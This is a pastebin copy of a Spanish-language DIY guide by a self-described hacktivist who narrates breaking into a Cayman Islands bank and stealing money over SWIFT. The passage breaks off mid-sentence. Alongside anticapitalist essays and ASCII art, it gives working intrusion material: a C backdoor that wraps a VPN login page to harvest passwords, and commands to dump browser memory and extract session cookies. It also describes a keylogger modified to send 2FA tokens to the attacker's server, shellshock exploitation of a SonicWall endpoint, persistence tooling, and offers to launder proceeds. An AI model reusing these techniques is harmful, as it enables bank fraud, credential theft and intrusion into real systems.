Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- https://twitter.com/DDoSecrets/status/1195904140213465089
- https://data.ddosecrets.com/file/Sherwood/
- https://data.ddosecrets.com/file/Sherwood/HackBack.txt
- _ _ _ ____ _ _
- | | | | __ _ ___| | __ | __ ) __ _ ___| | _| |
- | |_| |/ _` |/ __| |/ / | _ \ / _` |/ __| |/ / |
- | _ | (_| | (__| < | |_) | (_| | (__| <|_|
- |_| |_|\__,_|\___|_|\_\ |____/ \__,_|\___|_|\_(_)
- Una guÃa DIY para robar bancos
- ^__^
- (oo)\_______
- ( (__)\ )\/\
- _) / ||----w |
- (.)/ || ||
- `'
- Por el Subcowmandante Marcos
- Soy un niño salvaje
- Inocente, libre, silvestre
- Tengo todas las edades
- Mis abuelos viven en mÃ
- Soy hermano de las nubes
- Y sólo sé compartir
- Sé que todo es de todos
- que todo está vivo en mÃ
- Mi corazón es una estrella
- Soy hijo de la tierra
- Viajo a bordo de mi espÃritu
- Camino a la eternidad
- Ésta es mi palabra sencilla que busca tocar el corazón de la gente simple y
- humilde, pero también digna y rebelde. Ésta es mi palabra sencilla para contar
- de mis hackeos, y para invitar a otras personas a que hackeen con alegre
- rebeldÃa.
- Hackeé un banco. Lo hice para dar una inyección de liquidez, pero esta vez desde
- abajo y a la gente simple y humilde que resiste y se rebela contra las
- injusticias en todo el mundo. En otras palabras: robé un banco y regalé el
- dinero. Pero no fui yo sola quien lo hizo. El movimiento del software libre, la
- comunidad del powershell ofensivo, el proyecto metasploit y la comunidad hacker
- en general son las que posibilitaron este hackeo. La comunidad de exploit.in
- hizo posible convertir la intrusión en las computadoras de un banco en efectivo
- y bitcoin. Los proyectos Tor, Qubes y Whonix, junto a las y los criptógrafos y
- activistas que defienden la privacidad y el anonimato, son mis nahuales, es
- decir, mis protectores [1]. Me acompañan cada noche y hacen posible que siga en
- libertad.
- No hice nada complicado. Solamente vi la injusticia en este mundo, sentà amor
- por todos los seres, y expresé ese amor de la mejor forma que pude, mediante las
- herramientas que sé usar. No me mueve el odio a los bancos, ni a los ricos, sino
- un amor por la vida, y el deseo de un mundo donde cada quien pueda realizar su
- potencial y vivir una vida plena. Quisiera explicar un poco cómo veo el mundo,
- para que puedan hacerse una idea de cómo es que llegué a sentirme y actuar asÃ.
- Y espero también que esta guÃa sea una receta que puedan seguir, combinando los
- mismos ingredientes para hornear el mismo bizcocho. Quién sabe, por ahà estas
- herramientas tan potentes acaban sirviéndoles también a ustedes para expresar el
- amor que sienten.
- Todos somos niños salvajes
- inocentes, libres, silvestres
- Todos somos hermanos de los árboles
- hijos de la tierra
- Sólo tenemos que poner en nuestro corazón
- una estrella encendida
- (canción de Alberto Kuselman y Chamalú)
- La policÃa va a invertir un chingo de recursos en investigarme. Creen que el
- sistema funciona, o al menos que funcionará una vez que atrapen a todos los
- "chicos malos". No soy más que el producto de un sistema que no funciona.
- Mientras existan la injusticia, la explotación, la alienación, la violencia y la
- destrucción ecológica, vendrán muchas más como yo: una serie interminable de
- personas que rechazarán por ilegÃtimo el mal sistema responsable de este
- sufrimiento. Ese sistema mal hecho no se va a componer arrestándome. Soy
- solamente una de las millones de semillas que Tupac plantó hace 238 años en La
- Paz [2], y espero que mis acciones y escritos rieguen la semilla de la rebelión
- en sus corazones.
- [1] https://es.wikipedia.org/wiki/Cadejo#Origen_y_significado_del_mito
- [2] fue antes de ser asesinado por los españoles, justo un dÃa como ayer, que
- dijo eso de "a mi solo me matarán, pero mañana volveré y seré millones".
- ____________________________________________
- < Para que nos vieran, nos tapamos el rostro >
- --------------------------------------------
- \
- \ ^__^
- (oo)\_______
- ( (__)\ )\/\
- _) / ||----w |
- (.)/ || ||
- `'
- Para hacernos escuchar, a lxs hackers a veces nos toca taparnos la cara, porque
- no nos interesa que vean nuestro rostro sino que entiendan nuestra palabra. La
- máscara puede ser de Guy Fawkes, de Salvador DalÃ, de Fsociety, o en algún caso
- la marioneta de un sapo con cresta. Por afinidad, esta vez fui a desenterrar a
- un difunto para prestarme su pasamontañas. Creo entonces que deberÃa aclarar que
- el Sup Marcos es inocente de todo lo que aquà se cuenta porque, además de estar
- muerto, no le consulté. Espero que su fantasma, si se entera desde alguna hamaca
- chiapaneca, sepa encontrar la bondad para, como dicen allá, "desestimar este
- deep fake" con el mismo gesto con que se aleja un insecto inoportuno - que bien
- podrÃa ser un escarabajo.
- Aún asà con el pasamontañas y el cambio de nombre, muchos de los que apoyan mis
- acciones quizás van a prestar demasiada atención a mi persona. Con su propia
- autonomÃa hecha trizas por una vida entera de dominación, estarán buscando un
- lÃder a seguir, o una heroÃna que les salve. Pero detrás del pasamontañas sólo
- soy una niña. Todos somos niños salvajes. Nós só temos que colocar uma estrela
- em chamas em nossos corações.
- --[ 1 - Por qué expropiar ]-----------------------------------------------------
- El capitalismo es un sistema en el que una minorÃa se ha venido a apropiar de
- una vasta mayorÃa de los recursos del mundo a través de la guerra, el hurto y
- la explotación. Al arrebatarnos los comunes [1], forzaron a los de abajo a
- estar bajo el control de esa minorÃa que todo lo posee. Es un sistema
- fundamentalmente incompatible con la libertad, la igualdad, la democracia y el
- Suma Qamaña (Buen Vivir). Puede sonar ridÃculo para las que hemos crecido en una
- maquinaria propagandÃstica que nos enseñó que capitalismo es libertad, pero en
- verdad esto que digo no es una idea nueva ni controvertida [2]. Los fundadores
- de los Estados Unidos de América sabÃan que tenÃan que elegir entre crear una
- sociedad capitalista, o una libre y democrática. Madison reconocÃa que "el
- hombre que posee riqueza, el que se acuesta en su sofá o rueda en su carruaje,
- no puede juzgar los deseos o sentimientos del jornalero". Pero para protegerse
- frente al "espÃritu de equiparación" de los jornaleros sin tierra, le pareció
- que solamente los terratenientes debÃan votar, y que el gobierno tenÃa que
- servir para "proteger a la minoria opulenta frente a la gran mayoria". John
- Jay fue más al grano y dijo: "Aquellos que son dueños del paÃs deberÃan
- gobernarlo".
- ____________________________________________________
- / No existe eso que llaman capitalismo verde. \
- | Hagamos al capitalismo historia antes de que nos |
- \ convierta en historia. /
- ----------------------------------------------------
- \ /\ ___ /\
- \ // \/ \/ \\
- (( O O ))
- \\ / \ //
- \/ | | \/
- | | | | Evgeny, el gran elefante ignorado, no entiende por qué todos
- | | | | fingen no verle en los paneles sobre cambio climático, asÃ
- | o | que aquà le doy chance a decir sus lÃneas.
- | | | |
- |m| |m|
- De la misma forma que bell hooks [3] sostiene que el rechazo a la cultura
- patriarcal de dominación es un acto en defensa del propio interés del varón (ya
- que emocionalmente les mutila y evita que sientan amor y conexión de forma
- plena), creo que la cultura de dominación del capitalismo tiene un efecto
- similar sobre los ricos, y que podrÃan tener vidas más plenas y satisfactorias
- si rechazaran el sistema de clases del que creen que se benefician. Para muchos,
- el privilegio de clase equivale a una infancia de negligencia emocional, seguida
- de una vida de interacciones sociales superficiales y trabajo sin sentido. Puede
- que en el fondo sepan que sólo pueden conectar de forma genuina con las personas
- cuando trabajan con ellas como sus iguales, y no cuando las ponen a su servicio.
- Puede que sepan que compartir su riqueza material es lo mejor que pueden hacer
- con ella. Quizás sepan también que las experiencias significativas, las
- conexiones y las relaciones que cuentan no son las que provienen de las
- interacciones mercantiles, sino precisamente de rechazar la lógica del mercado
- y dar sin esperar nada a cambio. Tal vez sepan que todo lo que necesitan para
- escapar de su prisión y vivir de verdad es dejarse llevar, ceder el control, y
- dar un salto de fe. Pero a la mayorÃa les falta valentÃa.
- Entonces serÃa ingenuo por nuestra parte dirigir nuestros esfuerzos a tratar de
- producir alguna clase de despertar espiritual en los ricos [4]. Como dice Assata
- Shakur: "Nadie en el mundo, nadie en la historia, ha conseguido nunca su
- libertad apelando al sentido moral de sus opresores". En realidad, cuando los
- ricos reparten su dinero, casi siempre lo hacen de un modo que refuerza el
- sistema que para empezar les permitió amasar sus enormes e ilegÃtimas riquezas
- [5]. Y es poco probable que el cambio venga a través de un proceso polÃtico;
- como dice Lucy Parsons: "No nos dejemos nunca engañar con que los ricos nos
- vayan a dejar votar para arrebatarles sus riquezas". Colin Jenkins justifica la
- expropiación con estas palabras [6]:
- No nos equivoquemos, la expropiación no es robo. No es la confiscación de
- dinero ganado "con el sudor de la frente". No es el robo de propiedad
- privada. Es, más bien, la recuperación de enormes cantidades de tierra y
- riqueza que han sido forjadas con recursos naturales robados, esclavitud
- humana, fuerza de trabajo forzada y amasada en cientos de años por una
- pequeña minorÃa. Esta riqueza... es ilegÃtima, tanto a efectos morales como
- en tanto a los mecanismos de explotación que se han empleado para crearla.
- Para Colin, el primer paso es que "tenemos que liberarnos de nuestras ataduras
- mentales (al creer que la riqueza y la propiedad privada han sido ganadas por
- quienes las monopolizan; y que, por tanto, deberÃan ser algo a respetar,
- reverenciar, e incluso algo a perseguir), abrir nuestras mentes, estudiar y
- aprender de la historia, y reconocer juntos esta ilegitimidad". Acá les dejo
- algunos libros que me han ayudado con esto [7][8][9][10][11].
- Según Barack Obama, la desigualdad económica es "el desafÃo que define a nuestro
- tiempo". El hacking informático es una herramienta poderosa para combatir la
- desigualdad económica. El antiguo director de la NSA, Keith Alexander, concuerda
- y dice que el hacking es responsable de "la mayor transferencia de riqueza de la
- historia".
- _________________________
- / La historia es nuestra \
- \ y la hacen lxs hackers! /
- -------------------------
- \
- \ ^__^
- (oo)\_______
- ( (__)\ )\/\
- _) / ||----w |
- (.)/ || ||
- `'
- ¡Allende presente, ahora y siempre!
- [1] https://sursiendo.com/docs/Pensar_desde_los_comunes_web.pdf
- [2] https://chomsky.info/commongood02/
- [3] The Will to Change: Men, Masculinity, and Love
- [4] su propia religión ya es muy clara al respecto:
- https://dailyverses.net/es/materialismo
- [5] https://elpulso.hn/la-filantropia-en-los-tiempos-del-capitalismo/
- [6] http://www.hamptoninstitution.org/expropriation-or-bust.html
- [7] Manifiesto por una Civilización Democrática. Volumen 1, Civilización: La Era
- de los Dioses Enmascarados y los Reyes Cubiertos
- [8] Calibán y la Bruja
- [9] En deuda: Una historia alternativa de la economÃa
- [10] La otra historia de los Estados Unidos
- [11] Las venas abiertas de América Latina
- _________________________________
- < Nuestra arma es nuestro teclado >
- ---------------------------------
- \
- \ ^__^
- (oo)\_______
- ( (__)\ )\/\
- _) / ||----w |
- (.)/ || ||
- `' ^^ ^^
- --[ 2 - Introducción ]----------------------------------------------------------
- Esta guÃa explica cómo fue que hice el hackeo al Cayman Bank and Trust Company
- (Isla de Man). ¿Por qué estoy publicando esto, casi cuatro años después?
- 1) Para mostrar lo que es posible
- Los hackers que trabajan por el cambio social se han limitado a desarrollar
- herramientas de seguridad y privacidad, DDoS, realizar defaceos y filtraciones.
- Allá por donde vayas hay proyectos radicales por un cambio social en completo
- estado de precariedad, y serÃa mucho lo que podrÃan hacer con un poco de dinero
- expropiado. Al menos para la clase trabajadora, el robo de un banco es algo
- socialmente aceptado, y a los que lo hacen se les ve como héroes del pueblo. En
- la era digital, robar un banco es un acto no violento, menos arriesgado, y la
- recompensa es mayor que nunca. Entonces ¿por qué son solamente los hackers de
- sombrero negro que lo hacen para beneficio personal de ellos, y nunca los
- hacktivistas para financiar proyectos radicales? Quizás no se creen que son
- capaces de hacerlo. Los grandes hackeos bancarios salen en los noticieros cada
- tanto, como el hackeo al Banco de Bangladesh [1], que fue atribuido a Corea del
- Norte, o los hackeos a bancos atribuidos al grupo Carbanak [2], al que describen
- como un grupo muy grande y bien organizado de hackers rusos, con distintos
- miembros que estarÃan especializados en diferentes tareas. Y, pues no es tan
- complicado.
- Es por nuestra creencia colectiva en que el sistema financiero es incuestionable
- que ejercemos control sobre nosotras mismas, y mantenemos el sistema de clases
- sin que los de arriba tengan que hacer nada [3]. Poder ver cómo de vulnerable y
- frágil es en realidad el sistema financiero nos ayuda a romper esa alucinación
- colectiva. Por eso los bancos tienen un fuerte incentivo para no reportar los
- hackeos, y para exagerar cómo de sofisticados son los atacantes. Ninguno de los
- hackeos financieros que hice, o de los que he sabido, ha sido nunca reportado.
- Este va a ser el primero, y no porque el banco quisiera, sino porque yo me
- decidà a publicarlo.
- Como estás a punto de aprender en esta guÃa casera, hackear un banco y
- transferir los dineros a través de la red SWIFT no requiere del apoyo de ningún
- gobierno, ni de un grupo grande y especializado. Es algo totalmente posible
- siendo un mero hacker aficionado y del montón, con tan solo herramientas
- públicas y conocimientos básicos de cómo se escribe un script.
- [1] https://elpais.com/economia/2016/03/17/actualidad/1458200294_374693.html
- [2] https://securelist.lat/el-gran-robo-de-banco-el-apt-carbanak/67508/
- [3] https://es.wikipedia.org/wiki/Hegemon%C3%ADa_cultural
- 2) Ayudar a retirar el efectivo
- Muchos de los que lean esto ya tienen, o con un poco de estudio van a ser
- capaces de adquirir, las habilidades necesarias para llevar a cabo un hackeo
- como este. Sin embargo, muchos se van a encontrar con que les faltan las
- conexiones criminales necesarias para sacar los mangos en condiciones. En mi
- caso, este era el primer banco que hackeaba, y en ese momento sólo tenÃa unas
- pocas y mediocres cuentas preparadas para poder retirar el efectivo (conocidas
- como bank drops), asà que solamente fueron unos cuantos cientos de miles los que
- pude retirar en total, cuando lo normal es sacar millones. Ahora, en cambio, sÃ
- que tengo el conocimiento y las conexiones para sacar efectivo más en serio, de
- modo que si se encuentran hackeando un banco pero necesitan ayuda para convertir
- eso en dinero de a de veras, y quieren usar esa lana para financiar proyectos
- sociales radicales, se ponen en contacto conmigo.
- 3) Colaborar
- Es posible hackear bancos como una aficionada que trabaja en solitario, pero la
- neta es que, por lo general, no es tan fácil como lo pinto acá. Tuve suerte con
- este banco por varias razones:
- 1) Era un banco pequeño, por lo que me tomó mucho menos tiempo llegar a
- comprender cómo funcionaba todo.
- 2) No tenÃan ningún procedimiento para revisar los mensajes swift enviados.
- Muchos bancos tienen uno, y necesitas escribir código para esconder tus
- transferencias de su sistema de monitorización.
- 3) Sólo usaban autenticación por contraseña para acceder a la aplicación con la
- que se conectaban a la red SWIFT. La mayorÃa de los bancos ahora usan RSA
- SecurID, o alguna forma de 2FA. Puedes saltarte esto escribiendo código para
- recibir una alerta cuando entren su token, y asà poder usarlo antes de que
- expire. Es más sencillo de lo que parece: he usado Get-Keystrokes [1],
- modificándolo para que en vez de almacenar las teclas pulsadas, se haga una
- petición GET a mi servidor cada vez que se detecta que han introducido un
- nombre de usuario. Esta petición añade el nombre de usuario a la url y,
- conforme tipean el token, se hacen varios GET con los dÃgitos del token
- concatenados a la url. En mi lado dejo esto corriendo mientras tanto:
- ssh yo@mi_servidor_secreto 'tail -f /var/log/apache2/access_log'
- | while read i; do echo $i; aplay alarma.wav &> /dev/null; done
- Si es una aplicación web, puedes saltarte el 2FA robándoles la cookie
- después de que se hayan autenticado. No soy un APT con un equipo de coders
- que puedan hacerme herramientas a medida. Soy una persona sencilla que vive
- de lo que le da la terminal [2], de modo que lo que uso es:
- procdump64 /accepteula -r -ma PID_del_browser
- strings64 /accepteula *.dmp | findstr PHPSESSID 2> nul
- o pasándolo por findstr antes que por strings, lo que lo hace mucho más
- rápido:
- findstr PHPSESSID *.dmp > tmp
- strings64 /accepteula tmp | findstr PHPSESSID 2> nul
- Otra forma de saltártelo es accediendo a su sesión con un VNC oculto (hvnc)
- después de que se hayan autenticado, o con un poco de creatividad también
- podrÃas enfocarte en otra parte de su proceso en lugar de enviar mensajes
- SWIFT directamente.
- Creo que si colaborase con otros hackers bancarios con experiencia podrÃamos
- hacernos cientos de bancos como Carnabak, en vez de estar haciendo uno de tanto
- en tanto por mi cuenta. Asà que si tienes experiencia con hackeos similares y
- quieres colaborar, contactame. Encontrarás mi correo y mi llave PGP al final de
- la guÃa anterior [3].
- [1] https://github.com/PowerShellMafia/PowerSploit/blob/master/
- Exfiltration/Get-Keystrokes.ps1
- [2] https://lolbas-project.github.io/
- [3] https://www.exploit-db.com/papers/41914
- ________________________________________
- / Si robar un banco cambiara las cosas, \
- \ lo harÃan ilegal /
- ----------------------------------------
- \
- \ ^__^
- (oo)\_______
- ( (__)\ )\/\
- _) / ||----w |
- (.)/ || ||
- `'
- --[ 3 - Tengan cuidado ahà fuera ]----------------------------------------------
- Es importante tomar algunas precauciones sencillas. Voy a remitirme a esta
- misma sección de mi última guÃa [1], ya que por lo visto funciona bien nomás
- [2]. Todo lo que tengo que añadir es que, en palabras de Trump, "A menos que
- atrapes a los hackers in fraganti, es rete-difÃcil determinar quién es que
- estaba realizando el hackeo", de modo que la policÃa se está volviendo más y más
- creativa [3][4] en sus intentos de agarrar a los criminales en el acto (cuando
- sus discos duros cifrados están desbloqueados). Asà que estarÃa bueno si por
- ejemplo llevas encima un cierto dispositivo bluetooth y configuras tu
- computadora para que se apague cuando se aleje más allá de un cierto rango, o
- cuando un acelerómetro detecta movimiento, o algo por el estilo.
- Puede que escribir artÃculos largos detallando tus acciones y tu ideologÃa no
- sea la cosa más segura del mundo (¡ups!), pero a ratos siento que tenÃa que
- hacerlo.
- Si no creyera en quien me escucha
- Si no creyera en lo que duele
- Si no creyera en lo que quede
- Si no creyera en lo que lucha
- Que cosa fuera...
- ¿Que cosa fuera la maza sin cantera?
- [1] https://www.exploit-db.com/papers/41914
- [2] https://www.wifi-libre.com/topic-1268-italia-se-rinde-y-deja-de-buscar-a-
- phineas-fisher.html
- [3] https://www.wired.com/2015/05/silk-road-2/
- [4] https://motherboard.vice.com/en_us/article/59wwxx/fbi-airs-alexandre-cazes-
- alphabay-arrest-video
- ,-\__
- |f-"Y\ ____________________
- \()7L/ | ¡Sé gay! |
- cgD | ¡Haz el crimen! | __ _
- |\( --------------------- .' Y '>,
- \ \ \ / _ _ \
- \\\ \ )(_) (_)(|}
- \\\ { 4A } /
- \\\ \uLuJJ/\l
- \\\ |3 p)/
- \\\___ __________ /nnm_n//
- c7___-__,__-)\,__)(". \_>-<_/D
- //V \_"-._.__G G_c__.-__<"/ ( \
- <"-._>__-,G_.___)\ \7\
- ("-.__.| \"<.__.-" ) \ \
- |"-.__"\ |"-.__.-".\ \ \
- ("-.__"". \"-.__.-".| \_\
- \"-.__""|!|"-.__.-".) \ \
- "-.__""\_|"-.__.-"./ \ l
- ".__""">G>-.__.-"> .--,_
- "" G
- Muchos culpan a las personas queer del declive de esta sociedad;
- estamos orgullosxs de ello
- Algunos creen que queremos reducir a cenizas
- esta civilización y su tejido moral;
- No podrÃan estar más en lo cierto
- Con frecuencia nos describen como depravadxs, decadentes y revoltosxs
- Pero ¡ay! No han visto nada todavÃa
- https://theanarchistlibrary.org/library/mary-nardini-gang-be-gay-do-crime
- --[ 4 - Conseguir acceso ]------------------------------------------------------
- En otro lugar [1] les platicaba acerca de las vÃas principales para conseguir
- acceso inicial a la red de una compañÃa durante un ataque dirigido. Sin embargo,
- éste no era un ataque dirigido. No me propuse hackear un banco especÃfico, lo
- que querÃa era hackear cualquier banco, lo cual termina siendo una tarea mucho
- más sencilla. Este tipo de enfoque inespecÃfico fue popularizado por Lulzsec y
- Anonymous [2]. Como parte de [1], preparé un exploit y unas herramientas de
- post-explotación para un dispositivo de VPN popular. Luego me puse a escanear la
- internet entera con zmap [3] y zgrab para identificar otros dispositivos
- vulnerables. Hice que el escaner guardara las IPs vulnerables, junto con el
- "common name" y los "alt names" del certificado SSL del dispositivo, los nombres
- de dominio de windows del dispositivo, y la búsqueda DNS inversa de la IP. Le
- hice un grep al resultado en busca de la palabra "banco", y habÃa bastante para
- elegir, pero la verdad es que me atrajo la palabra "Cayman", y fue asà que vine
- a quedarme con este.
- [1] https://www.exploit-db.com/papers/41914
- [2] https://web.archive.org/web/20190329001614/http://infosuck.org/0x0098.png
- [3] https://github.com/zmap/zmap
- ----[ 4.1 - El Exploit ]--------------------------------------------------------
- Cuando publiqué mi última guÃa DIY [1] no revelé los detalles del exploit de
- sonicwall que habÃa usado para hackear a Hacking Team, ya que era muy útil para
- otros hackeos, como este mismo, y todavÃa no habÃa acabado de divertirme con él.
- Determinada entonces a hackear a Hacking Team, pasé semanas haciendo ingenierÃa
- inversa a su modelo del ssl-vpn de sonicwall, e incluso conseguà encontrar
- varias vulnerabilidades de corrupción de memoria más o menos difÃciles de
- explotar, antes de darme cuenta de que el dispositivo era fácilmente explotable
- con shellshock [2]. Cuando salió shellshock, muchos dispositivos sonicwall eran
- vulnerables, sólo con una petición a cgi-bin/welcome, y un payload en el
- user-agent. Dell sacó una actualización de seguridad y un advisory para estas
- versiones. La versión usada por Hacking Team y este banco tenÃa la versión de
- bash vulnerable, pero las peticiones cgi no disparaban el shellshock excepto por
- las peticiones a un shell script, y justo habÃa uno accesible:
- cgi-bin/jarrewrite.sh. Esto parece que se les escapó a los de Dell en su nota,
- ya que nunca sacaron una actualización de seguridad ni un advisory para esa
- versión del sonicwall. Y, amablemente, Dell habÃa hecho dos2unix setuid root,
- dejando un dispositivo fácil de rootear.
- En mi última guÃa muchos leyeron que pasé semanas investigando un dispositivo
- hasta dar con un exploit, y asumieron que eso significaba que yo era algún tipo
- de hacker de élite. La realidad, es decir, el hecho de que me llevó dos semanas
- darme cuenta de que era trivialmente explotable con shellshock, es tal vez menos
- halagadora para mÃ, pero pienso que también es más inspiradora. Demuestra que
- de verdad tú puedes hacer esto por tà misma. No necesitas ser un genio, yo
- ciertamente no lo soy. En realidad mi trabajo contra Hacking Team comenzó un
- año antes. Cuando descubrà a Hacking Team y al Grupo Gamma en las
- investigaciones de CitizenLab [3][4], decidà explorar un poco y ver si podÃa
- encontrar algo. No llegué a ninguna parte con Hacking Team, pero tuve suerte con
- Gamma Group, y pude hackear su portal de atención al cliente con inyección sql
- básica y vulnerabilidades de subida de archivos [5][6]. Sin embargo, a pesar de
- que su servidor de soporte me daba un pivote hacia la red interna de Gamma
- Group, fui incapaz de penetrar mas allá en la compañÃa. A partir de esta
- experiencia con el Grupo Gamma y otros hacks, me di cuenta de que estaba
- realmente limitada por mi falta de conocimiento sobre escalada de privilegios y
- movimiento lateral en dominios windows, active directory y windows en general.
- Asà que estudié y practiqué (ver sección 11), hasta que sentà que estaba lista
- para volver a hacerle una visita a Hacking Team casi un año después. La práctica
- dio sus frutos, y esa vez fui capaz de realizar un compromiso completo de la
- compañÃa [7]. Antes de darme cuenta de que podÃa entrar con shellshock, estaba
- dispuesta a pasar meses enteros feliz de la vida estudiando desarrollo de
- exploits y escribiendo un exploit confiable para una de las vulnerabilidades de
- corrupción de memoria que habÃa encontrado. Sólo sabÃa que Hacking Team
- necesitaba ser expuesto, y que me tomarÃa tanto tiempo como fuese necesario y
- aprenderÃa lo que tuviese que aprender para conseguirlo. Para realizar estos
- hacks no necesitas ser brillante. Ni siquiera necesitas un gran conocimiento
- técnico. Sólo necesitas dedicación, y creer en tà misma.
- [1] https://www.exploit-db.com/papers/41914
- [2] https://es.wikipedia.org/wiki/Shellshock_(error_de_software)
- [3] https://citizenlab.ca/tag/hacking-team/
- [4] https://citizenlab.ca/tag/finfisher/
- [5] https://theintercept.com/2014/08/07/leaked-files-german-spy-company-helped-
- bahrain-track-arab-spring-protesters/
- [6] https://www.exploit-db.com/papers/41913
- [7] https://web.archive.org/web/20150706095436/https://twitter.com/hackingteam
- ----[ 4.2 - El Backdoor ]-------------------------------------------------------
- Parte del backdoor que preparé para Hacking Team (véase [1], sección 6) era un
- wrapper sencillo sobre la página de login para capturar contraseñas:
- #include <stdio.h>
- #include <unistd.h>
- #include <fcntl.h>
- #include <string.h>
- #include <stdlib.h>
- int main()
- {
- char buf[2048];
- int nread, pfile;
- /* jala el log si mandamos una cookie especial */
- char *cookies = getenv("HTTP_COOKIE");
- if (cookies && strstr(cookies, "nuestra contraseña privada")) {
- write(1, "Content-type: text/plain\n\n", 26);
- pfile = open("/tmp/.pfile", O_RDONLY);
- while ((nread = read(pfile, buf, sizeof(buf))) > 0)
- write(1, buf, nread);
- exit(0);
- }
- /* el principal almacena los datos del POST y se los envÃa al hijo,
- que es el programa de login real */
- int fd[2];
- pipe(fd);
- pfile = open("/tmp/.pfile", O_APPEND | O_CREAT | O_WRONLY, 0600);
- if (fork()) {
- close(fd[0]);
- while ((nread = read(0, buf, sizeof(buf))) > 0) {
- write(fd[1], buf, nread);
- write(pfile, buf, nread);
- }
- write(pfile, "\n", 1);
- close(fd[1]);
- close(pfile);
- wait(NULL);
- } else {
- close(fd[1]);
- dup2(fd[0],0);
- close(fd[0]);
- execl("/usr/src/EasyAccess/www/cgi-bin/.userLogin",
- "userLogin", NULL);
- }
- }
- En el caso de Hacking Team, se logueaban a la VPN con passwords de un solo uso,
- de modo que la VPN me dio acceso solamente a la red, y a partir de ahà me tomó
- un esfuerzo extra conseguir admin de dominio en su red. En la otra guÃa escribÃ
- sobre pases laterales y escalada de privilegios en dominios windows [1]. En este
- caso, en cambio, eran las mismas contraseñas de dominio de windows las que se
- usaban para autenticarse contra la VPN, asà que pude conseguir un buen de
- contraseñas de usuarios, incluyendo la del admin de dominio. Ahora tenÃa total
- acceso a su red, pero usualmente esta es la parte fácil. La parte más complicada
- es entender cómo es que operan y cómo sacar el pisto.
- [1] https://www.exploit-db.com/papers/41914
- ----[ 4.3 - Datos curiosos ]----------------------------------------------------
- Al seguir la investigación que hicieron sobre el hackeo, me resultó interesante
- ver que, por la misma época en que yo lo hice, el banco pudo haber sido
- comprometido por alguna otra persona mediante un email de phishing dirigido [1].
- Como dice el viejo dicho, "dale a una persona un exploit y tendrá acceso por un
- dÃa, enséñale a phishear y tendrá acceso toda su vida" [2]. El hecho de que
- alguien más, por casualidad y al mismo tiempo que yo, se pusiera este banco
- pequeño en la mira (registraron un dominio similar al dominio real del banco
- para poder enviar el phishing desde ahÃ) hace pensar que los hackeos bancarios
- ocurren con mucha más frecuencia de lo que se conoce.
- Una sugerencia divertida para que puedas seguir las investigaciones de tus
- hackeos es tener un acceso de respaldo, uno que no vas a tocar a menos que
- pierdas el acceso normal. Tengo un script sencillo que espera comandos una
- vez al dia, o menos, sólo para mantener acceso a largo plazo en el caso de
- que bloqueen mi acceso regular. Luego tenÃa un powershell empire [3]
- llamando a casa con más frecuencia a una IP diferente, y usaba empire para
- lanzar meterpreter [4] contra una tercera IP, donde realizaba la mayor parte de
- mi trabajo. Cuando PWC se puso a investigar el hackeo, encontraron mi uso de
- empire y meterpreter y limpiaron esas computadoras y bloquearon esas IPs, pero
- no detectaron mi acceso de respaldo. PWC habia colocado dispositivos de
- monitoreo de red, para poder analizar el tráfico y ver si todavÃa habÃa
- computadoras infectadas, de modo que no querÃa conectarme mucho a su red. Sólo
- lancé mimikatz una vez para obtener las nuevas contraseñas, y a partir de ahÃ
- pude seguir sus investigaciones leyendo sus correos en el outlook web access.
- [1] página 47, Project Pallid Nutmeg.pdf, en torrent
- [2] https://twitter.com/thegrugq/status/563964286783877121
- [3] https://github.com/EmpireProject/Empire
- [4] https://github.com/rapid7/metasploit-framework
- --[ 5 - Entender las Operaciones Bancarias ]------------------------------------
- Para entender cómo operaba el banco, y cómo podrÃa sacar dinero, seguà las
- técnicas que resumà en [1], en la sección "13.3 - Reconocimiento Interno".
- Descargué una lista de todos los nombres de archivos, le hice un grep en busca
- de palabras como "SWIFT" y "transferencia", y descargué y leà todos los
- archivos con nombres interesantes. También busqué correos de empleados, pero de
- lejos la técnica más útil fue usar keyloggers y capturas de pantalla para
- observar cómo trabajaban los empleados del banco. No lo sabÃa por entonces, pero
- para esto windows trae una herramienta buenisima de monitoreo [2]. Como se
- describe en la técnica no. 5 del apartado 13.3 en [1], hice una captura de las
- teclas pulsadas en todo el dominio (incluyendo los tÃtulos de ventana), hice un
- grep en busca de SWIFT, y encontré algunos empleados abriendo 'SWIFT Access
- Service Bureau - Logon'. Para esos empleados, corrà meterpreter como en [3], y
- usé el módulo post/windows/gather/screen_spy para tomar capturas de pantalla
- cada 5 segundos, para observar cómo es que trabajaban. Estaban usando una app
- citrix remota de la compañÃa bottomline [4] para acceder a la red SWIFT, donde
- cada mensaje de pago SWIFT MT103 tenÃa que pasar a través de tres empleados: uno
- para "crear" el mensaje, uno para "verificarlo", y otro para "autorizarlo". Como
- ya tenÃa todas sus credenciales gracias al keylogger, pude realizar con
- facilidad los tres pasos yo misma. Y por lo que sabÃa después de haberles visto
- trabajar, no revisaban los mensajes SWIFT enviados, de modo que deberÃa tener
- suficiente tiempo para sacar el dinero de mis bank drops antes de que el banco
- se diera cuenta e intentara revertir las transferencias.
- [1] https://www.exploit-db.com/papers/41914
- [2] https://cyberarms.wordpress.com/2016/02/13/using-problem-steps-recorder-psr-
- remotely-with-metasploit/
- [3] https://www.trustedsec.com/blog/no_psexec_needed/
- [4] https://www.bottomline.com/uk/products/bottomline-swift-access-services
- _________________________________________
- / Quien roba a un ladrón, tiene cien años \
- \ de perdón. /
- -----------------------------------------
- \
- \ ^__^
- (oo)\_______
- ( (__)\ )\/\
- _) / ||----w |
- (.)/ || ||
- `'
- --[ 6 - Enviar el dinero ]------------------------------------------------------
- No tenÃa mucha idea de lo que estaba haciendo, asà que lo iba descubriendo
- por el camino. De algún modo, las primeras transferencias que envié salieron
- bien. Al dÃa siguiente, la cagué enviando una transferencia a méxico que puso
- fin a mi diversión. Este banco enviaba sus transferencias internacionales
- a través de su cuenta corresponsal en Natwest. HabÃa visto que la cuenta
- corresponsal para las transferencias en libras esterlinas (GBP) aparecÃa como
- NWBKGB2LGPL, mientras que para las demás era NWBKGB2LXXX. La transferencia
- mexicana estaba en GBP, asà que asumà que tenÃa que poner NWBKGB2LGPL como
- corresponsal. Si lo hubiera preparado mejor habrÃa sabido que el GPL en lugar de
- XXX señalaba que el pago se enviarÃa a través del Servicio de Pagos Rápidos del
- Reino Unido, en lugar de como una transferencia internacional, lo que obviamente
- pues no va a funcionar cuando estás tratando de enviar dinero a méxico. Asà que
- al banco le llegó un mensaje de error. El mismo dÃa también traté de enviar un
- pago de £200k a UK usando NWBKGB2LGPL, que no se hizo porque 200k sobrepasaba el
